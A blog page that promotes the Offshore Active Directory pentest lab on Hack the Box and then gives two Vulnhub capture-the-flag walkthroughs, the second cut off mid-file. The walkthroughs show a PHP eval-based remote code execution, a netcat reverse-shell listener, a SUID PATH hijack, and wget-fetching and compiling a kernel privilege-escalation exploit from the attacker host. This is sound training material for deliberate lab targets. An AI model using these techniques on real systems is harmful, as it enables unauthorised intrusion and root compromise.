Offshore – A Windows Active Directory Pentesting Lab

Intro

In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.

I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.

Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, ram and virtual networks.

I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years.  My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.

The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned but overall it has been a success.  This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.

Anyways, lets get into a description of the lab.

Description

You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:

  • Web application attacks
  • Enumeration
  • Exploitation of common and obscure real-world Active Directory flaws
  • Local privilege escalation
  • Lateral movement and crossing trust boundaries
  • Evading endpoint protections
  • Reverse engineering
  • Out-of-the-box thinking

Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.

Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.

Target Audience

I designed Offshore to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned testers as well as infosec hobbyists and even blue teamers, there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or take back to your organization to  help improve the overall security posture.

Pricing

Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.

Additional Information

Offshore is hosted in conjunction with Hack the Box  (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.

Once connected to VPN, the entry point for the lab is 10.10.110.0/24.  *Note* The firewall at 10.10.110.3 is out of scope.

If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the  Netsecfocus  Mattermost (https://chat.netsecfocus.com/join).

Ew_Skuzzy:1 vulnhub walkthrough

It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.

I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.

You can grab the VM here: https://www.vulnhub.com/entry/ew_skuzzy-1,184/

The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

        1) sudo su
	2) mount /dev/sda1 /mnt
	3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
	4) Vim /mnt/etc/default/grub and edit the line 
	GRUB_CMDLINE_LINUX="" to read: 
	GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
	5) Poweroff
	6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
	7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
	8) In this shell type "update-grub" then type "exit"
	9) Select "execute a shell in the installer environment", then "poweroff"
       10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

Once that was done I fired up the VM,  and got to work. The creator was nice enough to post the IP for us:

I started off with an nmap scan of all ports which showed SSH, nginx on port 80 and an ISCSI service listening on port 3260.

root@kali:~# nmap -sV -p- -T4 192.168.85.146 

Starting Nmap 6.46 ( http://nmap.org ) at 2017-03-21 13:09 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.85.146
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address: 00:0C:29:C8:3D:31 (VMware)

I ran dirb for a bit and came up with several trolls:

The page source of the above page had a base64 encoded comment in the HTML:

Sadly not our first flag:

root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do

And I want to tell you so much, no flags for you...

This was my first time dealing with an ISCSI service so I found this link very helpful: https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/

My first step was to download and install open-iscsi. I was using an older Kali1 VM for this so it was easier to just manually grab and install the .deb from here: https://packages.debian.org/jessie/i386/open-iscsi/download

root@kali:~# dpkg -i open-iscsi_2.0.873+git0.3b4b4500-8+deb8u2_i386.deb

I next ran some discovery with iscsiadm:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.85.146:3260
192.168.85.146:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Next I used iscsiadm to connect to the target:

root@kali:~# iscsiadm -m node -p 192.168.85.146 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] successful.

fdisk showed me that I now had an additional drive (/dev/sbdb):

root@kali:~# fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000d28c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    40136703    20067328   83  Linux
/dev/sda2        40138750    41940991      901121    5  Extended
/dev/sda5        40138752    41940991      901120   82  Linux swap / Solaris

Disk /dev/sdb: 1073 MB, 1073741824 bytes
34 heads, 61 sectors/track, 1011 cylinders, total 2097152 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

Disk /dev/sdb doesn't contain a valid partition table

I next mounted the file system and found the first flag along with a floppy disk image:

root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk  flag1.txt  lost+found
root@kali:/mnt/skuzzy# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

The floppy can be mounted with the following commands:

root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk 

root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy  hgfs  skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv.enc  ToAlice.eml

An email to Alice gave me flag # 2 as well as several clues for how to decrypt the encrypted .csv file:

root@kali:/mnt/floppy# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) 🙂

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

What stuck out was the following:

  • Competition in October 2000 (AES);
  • 256 bit;
  • “those blocks chain together”  (cipher block chaining);
  • The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
  • An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
  • Command option -md sha256 (these are openssl command line options).

The intent may have been to brute force the passphrase but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:

root@kali:/mnt/floppy# openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md SHA256
enter aes-256-cbc decryption password:
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv  ToAlice.csv.enc  ToAlice.eml

The .csv gave me flag #3 as well as some new web directories to target:

The first was a troll with some retro Geocities scrolling marquee, nice touch:

The page source again contained a base64 encoded comment which was another troll:

root@kali:~# cat base64.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Soup Nazi: NO FLAG FOR YOU

The second URL was a sweet custom web app:

The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!

Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:

Browsing directly to the data.txt file gave me the full contents which would be useful later:

I checked the troll image exif data for any clues but there was nothing to be had.

I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.

Index.php

Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:

The contents of reader.php was particularly interesting:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
	    $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂 
	    if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
	    }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

A check was being made to make sure that the file being server was from the localhost otherwise a key value was needed. The key value had to be the sha256 of a 47 character string and passed as a parameter with the GET request. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:

root@kali:/var/www# echo -n flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} | sha256sum
5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656 

The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.

 

There are several ways to get a shell but this is what I tried after trying to obtain a reverse shell with mknod, netcat and other methods did not work. This could have been split into one command as well instead of two.

I created a tiny shell script with the following PHP command and hosted it on my local Apache server:

I then executed the following two commands to upload the shell script to /tmp and execute it:

Wonderful, a shell!

root@kali:/var/www# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.85.131] from (UNKNOWN) [192.168.85.146] 51562
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt  index.php   party.php   trollface.png
flag.php  parrot.gif  reader.php  welcome.php

The usual enumeration turned up an interesting SUID binary in /opt.

www-data@skuzzy:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

Just running the binary it appeared to execute the ID command before attempting to make an SSH connection:

On a hunch that ID command was not being called with an absolute path I created a dummy file /tmp/id with the contents “/bin/sh” and modified my path variable. By doing this, if successful, when running the alicebackup binary from the /opt directory while in the /tmp directory I should be able to have the program call my malicious ID shell script due to the path abuse.

I ran the command, fixed up my path variable and it worked. I now had root access and the 5th and final flag:

This was a great VM and an interesting twist with the ISCSI angle as well as the combined LFI/RFI. Unique and kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.

Thanks to @vortexau for putting together challenge, can’t wait to see the next one!

As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.

 

Analoguepond Vulnhub Walkthrough

Just around the time I was learning/experimenting with Puppet in my home lab knightmare   asked me to preview a new VM based around some real-world  tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/

The README provides some hints for getting going:

Since you're not a Teuchter, I'll offer some hints to you:

Remember TCP is not the only protocol on the Internet My challenges are never finished with root. I make you work for the flags. The intended route is NOT to use forensics or 0-days, I will not complain either way.

To consider this VM complete, you need to have obtained:

    Troll Flag: where you normally look for them
    Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am.
    Flag 2: It will include a final challenge to confirm you hit the jackpot.
    Have root everywhere (this will make sense once you're in the VM)
    User passwords
    2 VNC passwords

Best of luck! If you get stuck, eat some EXTRABACON

NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.

After loading it up and waiting a few minutes I had an IP and was ready to go:

I added an entry to my hosts file to simplify things and  started out with an nmap scan of all TCP ports and also a UDP scan of top 1000 ports due to the readme alluding to other protocols in use.

The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.

root@mrb3n:~# nmap -sV -Pn -T4 -p- --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 09:39 EST
Stats: 0:10:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.70% done; ETC: 10:05 (0:15:34 remaining)
Nmap scan report for 192.168.85.128
Host is up (0.0010s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:C9:A7:A4 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP scan turned up SNMP and based on the readme nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed by attention here with snmpwalk.

root@mrb3n:~# nmap -sU --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 06:07 EST
Nmap scan report for 192.168.85.128
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:C9:A7:A4 (VMware)

I’ve truncated the output and just left in the key items

root@mrb3n:~# snmpwalk analoguepond -c public -v1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (16) 0:00:00.16

So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only the “the Rising Sun”. Which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.

Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.

Once in I was dropped into Eric’s home directory and had a couple of images as well as a binary named ‘spin’ which appeared to do just that, throw up a spinning cursor. Not useful…yet. I pulled down the images with SCP and checked for anything tasty in the exif data but came up empty, for now.

eric@analougepond:~$ pwd
/home/eric
eric@analougepond:~$ ls
reticulatingsplines.gif  

root@mrb3n:~# scp eric@analoguepond:/home/eric/reticulatingsplines.gif /var/www/html/
eric@analoguepond's password: 
reticulatingsplines.gif                                                                                                100%   29KB   2.4MB/s   00:00   

hmm, no clue at this point but I’ll hang onto it, it may prove to be useful.

The readme mentioned VNC passwords, a netstat showed that VNC was present on the localhost on 5900 and 5901. Ifconfig showed a virtual bridge on the 192.168.122.0/24 subnet so we must be dealing with some libvirt emulation here. The readme also mentions multiple hosts, I am guessing 2 additional ones :).

eric@analougepond:~$ netstat -antp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0    408 192.168.85.128:22       192.168.85.129:55386    ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN
eric@analougepond:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:c9:a7:a4  
          inet addr:192.168.85.128  Bcast:192.168.85.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fec9:a7a4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6766 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5594 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:452860 (452.8 KB)  TX bytes:521927 (521.9 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:71 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6140 (6.1 KB)  TX bytes:6140 (6.1 KB)

virbr0    Link encap:Ethernet  HWaddr 52:54:00:b2:23:25  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:440 errors:0 dropped:0 overruns:0 frame:0
          TX packets:218 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24024 (24.0 KB)  TX bytes:17414 (17.4 KB)

vnet0     Link encap:Ethernet  HWaddr fe:54:00:6d:93:6a  
          inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:424 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1698 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:202700 (202.7 KB)  TX bytes:243315 (243.3 KB)

vnet1     Link encap:Ethernet  HWaddr fe:54:00:5b:05:f7  
          inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:707 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1919 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500 
          RX bytes:194781 (194.7 KB)  TX bytes:285088 (285.0 KB)

Pulling up virsh and listing out the virtual hosts confirmed what we are dealing with.

virsh # list
 Id    Name                           State
----------------------------------------------------
 2     barringsbank                   running
 3     puppet                         running

Looking around the file system I really didn’t find much at first. Digging deeper I believe I found the locations of the VNC passwords  but could not read them until I was root, will come back to that later.

Doing a uname -a showed that the kernel was likely vulnerable to the overlayfs root exploit:

eric@analoguepond:/var/lib/libvirt/network$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Several options come up in exploit-db

root@kali2-CTP:/var/www/html# searchsploit overlayfs
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                        |  Path
                                                                                                                      | (/usr/share/exploitdb/platforms)
---------------------------------------------------------------------------------------------------------------------- ----------------------------------
OverlayFS inode Security Checks - 'inode.c' Local Security Bypass                                                     | /linux/local/36571.sh
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                        | /linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)   | /linux/local/37293.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)                                        | /linux/local/39166.c
Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)                                                             | /linux/local/39230.c
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)                               | /linux/local/40688.rb

Let’s go with 39166.c because this one has worked for me a few times in the past.  We pull the file over to the target and compile it.

eric@analoguepond:/tmp$ wget http://192.168.110.145/39166.c
--2017-06-26 17:16:53--  http://192.168.110.145/39166.c
Connecting to 192.168.110.145:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2681 (2.6K) [text/x-csrc]
Saving to: ‘39166.c’

100%[===============================================================================================================>] 2,681       --.-K/s   in 0s      

2017-06-26 17:16:53 (47.6 MB/s) - ‘39166.c’ saved [2681/2681]

eric@analoguepond:/tmp$ gcc 39166.c -o dobber
eric@analoguepond:/tmp$ chmod +x dobber 
eric@analoguepond:/tmp$ ./dobber

Running it and we’ve got out root shell and of course our first troll flag.

root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Taking a look at the libvirsh default.xml networking file gives us IPs and hostnames for our other hosts.

root@analoguepond:/var/lib/libvirt/network# ls
default.xml
root@analoguepond:/var/lib/libvirt/network# cat default.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh net-edit default
or other application using the libvirt API.
-->

<networkstatus>
  <class_id bitmap='0-2'/>
  <floor sum='0'/>
  <network>
    <name>default</name>
    <uuid>8edd2858-f408-4a4a-86f1-0993b59c6b30</uuid>
    <forward mode='nat'>
      <nat>
        <port start='1024' end='65535'/>
      </nat>
    </forward>
    <bridge name='virbr0' stp='on' delay='0'/>
    <mac address='52:54:00:b2:23:25'/>
    <ip address='192.168.122.1' netmask='255.255.255.0'>
      <dhcp>
        <range start='192.168.122.10' end='192.168.122.15'/>
        <host mac='52:54:00:5b:05:f7' name='puppet' ip='192.168.122.2'/>
        <host mac='52:54:00:6d:93:6a' name='barringsbank' ip='192.168.122.3'/>
      </dhcp>
    </ip>
  </network>

We can also find live  hosts with a little bash one-liner:

root@analoguepond:/var/lib/libvirt/network# for ip in 192.168.122.{1..254}; do ping -c 1 $ip > /dev/null && echo "${ip} is up"; done
192.168.122.1 is up
192.168.122.2 is up
192.168.122.3 is up

Next we need the qemu config files to grab the VNC passwords:

find / -name "*.xml"
...snip...

/etc/libvirt/qemu/barringsbank.xml
/etc/libvirt/qemu/puppet.xml


root@analoguepond:/etc/libvirt/qemu# cat barringsbank.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit barringsbank
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>barringsbank</name>
  <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
